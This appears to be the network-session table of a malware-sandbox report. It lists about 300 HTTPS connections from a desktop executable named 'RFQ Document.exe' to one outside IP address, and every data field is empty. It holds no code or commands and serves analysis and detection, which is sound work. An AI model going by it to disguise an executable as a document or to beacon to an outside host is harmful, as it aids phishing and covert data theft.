Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
174	192.168.2.4	49994	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
175	192.168.2.4	49996	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
176	192.168.2.4	49997	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
177	192.168.2.4	49998	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
178	192.168.2.4	49999	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
179	192.168.2.4	50000	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49792	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
180	192.168.2.4	50001	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
181	192.168.2.4	50002	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
182	192.168.2.4	50003	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
183	192.168.2.4	50004	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
184	192.168.2.4	50005	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
185	192.168.2.4	50006	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
186	192.168.2.4	50007	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
187	192.168.2.4	50008	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
188	192.168.2.4	50009	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
189	192.168.2.4	50010	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49793	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
190	192.168.2.4	50011	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
191	192.168.2.4	50012	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
192	192.168.2.4	50013	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
193	192.168.2.4	50014	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
194	192.168.2.4	50015	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
195	192.168.2.4	50016	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
196	192.168.2.4	50017	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
197	192.168.2.4	50018	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
198	192.168.2.4	50019	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
199	192.168.2.4	50020	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49776	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49794	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
200	192.168.2.4	50021	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
201	192.168.2.4	50022	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
202	192.168.2.4	50023	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
203	192.168.2.4	50024	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
204	192.168.2.4	50025	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
205	192.168.2.4	50026	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
206	192.168.2.4	50027	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
207	192.168.2.4	50028	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
208	192.168.2.4	50029	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
209	192.168.2.4	50030	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49795	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
210	192.168.2.4	50031	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
211	192.168.2.4	50032	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
212	192.168.2.4	50033	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
213	192.168.2.4	50034	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
214	192.168.2.4	50035	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
215	192.168.2.4	50036	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
216	192.168.2.4	50037	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
217	192.168.2.4	50038	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
218	192.168.2.4	50039	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
219	192.168.2.4	50040	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49796	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
220	192.168.2.4	50041	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
221	192.168.2.4	50042	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
222	192.168.2.4	50043	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
223	192.168.2.4	50044	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
224	192.168.2.4	50045	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
225	192.168.2.4	50046	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
226	192.168.2.4	50047	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
227	192.168.2.4	50048	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
228	192.168.2.4	50049	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
229	192.168.2.4	50050	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49797	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
230	192.168.2.4	50051	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
231	192.168.2.4	50052	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
232	192.168.2.4	50053	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
233	192.168.2.4	50054	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
234	192.168.2.4	50055	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
235	192.168.2.4	50056	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
236	192.168.2.4	50057	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
237	192.168.2.4	50058	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
238	192.168.2.4	50059	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
239	192.168.2.4	50060	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49798	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
240	192.168.2.4	50061	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
241	192.168.2.4	50062	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
242	192.168.2.4	50063	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
243	192.168.2.4	50065	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
244	192.168.2.4	50066	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
245	192.168.2.4	50067	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
246	192.168.2.4	50068	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
247	192.168.2.4	50070	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
248	192.168.2.4	50072	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
249	192.168.2.4	50073	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49799	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
250	192.168.2.4	50076	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
251	192.168.2.4	50078	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
252	192.168.2.4	50080	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
253	192.168.2.4	50082	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
254	192.168.2.4	50084	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
255	192.168.2.4	50087	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
256	192.168.2.4	50089	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
257	192.168.2.4	50091	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
258	192.168.2.4	50093	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
259	192.168.2.4	50094	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49800	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
260	192.168.2.4	50097	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
261	192.168.2.4	50098	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
262	192.168.2.4	50099	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
263	192.168.2.4	50100	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
264	192.168.2.4	50101	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
265	192.168.2.4	50102	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
266	192.168.2.4	50103	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
267	192.168.2.4	50104	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
268	192.168.2.4	50105	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
269	192.168.2.4	50106	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49801	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
270	192.168.2.4	50107	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
271	192.168.2.4	50108	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
272	192.168.2.4	50109	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
273	192.168.2.4	50110	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
274	192.168.2.4	50111	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
275	192.168.2.4	50112	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
276	192.168.2.4	50113	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
277	192.168.2.4	50114	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
278	192.168.2.4	50115	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
279	192.168.2.4	50116	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49802	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
280	192.168.2.4	50117	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
281	192.168.2.4	50118	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
282	192.168.2.4	50119	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
283	192.168.2.4	50120	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
284	192.168.2.4	50121	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
285	192.168.2.4	50122	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
286	192.168.2.4	50123	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
287	192.168.2.4	50124	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
288	192.168.2.4	50125	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
289	192.168.2.4	50126	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49803	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
290	192.168.2.4	50127	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
291	192.168.2.4	50128	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
292	192.168.2.4	50129	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
293	192.168.2.4	50130	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
294	192.168.2.4	50131	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
295	192.168.2.4	50132	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
296	192.168.2.4	50133	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
297	192.168.2.4	50134	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
298	192.168.2.4	50135	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
299	192.168.2.4	50136	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49777	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49804	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
300	192.168.2.4	50137	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
301	192.168.2.4	50138	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
302	192.168.2.4	50139	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
303	192.168.2.4	50140	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
304	192.168.2.4	50141	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
305	192.168.2.4	50142	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
306	192.168.2.4	50143	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
307	192.168.2.4	50144	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
308	192.168.2.4	50145	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
309	192.168.2.4	50146	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49805	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
310	192.168.2.4	50147	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
311	192.168.2.4	50148	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
